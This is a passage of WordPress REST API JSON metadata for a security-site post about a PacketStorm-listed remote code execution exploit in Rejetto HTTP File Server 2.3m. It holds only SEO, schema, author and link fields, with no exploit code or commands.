redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Rejetto HTTP File Server 2.3m Unauthenticated Remote Code Execution_PACKETSTORM:215806 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=41404","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Rejetto HTTP File Server 2.3m Unauthenticated Remote Code Execution_PACKETSTORM:215806 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-18T17:35:48&#8243;,&#8221;description&#8221;:&#8221;Proof of concept exploit for an unauthenticated remote code execution vulnerability in Rejetto HTTP File Server version 2.3m that leverages template injection&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-18T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-18T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Rejetto HTTP File...","og_url":"https:\/\/zero.redgem.net\/?p=41404","og_site_name":"zero redgem","article_published_time":"2026-02-18T12:49:51+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=41404#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=41404"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Rejetto HTTP File Server 2.3m Unauthenticated Remote Code Execution_PACKETSTORM:215806","datePublished":"2026-02-18T12:49:51+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=41404"},"wordCount":1601,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=41404#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=41404","url":"https:\/\/zero.redgem.net\/?p=41404","name":"\ud83d\udcc4 Rejetto HTTP File Server 2.3m Unauthenticated Remote Code Execution_PACKETSTORM:215806 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-18T12:49:51+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=41404#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=41404"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=41404#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Rejetto HTTP File Server 2.3m Unauthenticated Remote Code Execution_PACKETSTORM:215806"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41404","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=41404"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41404\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=41404"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=41404"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=41404"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}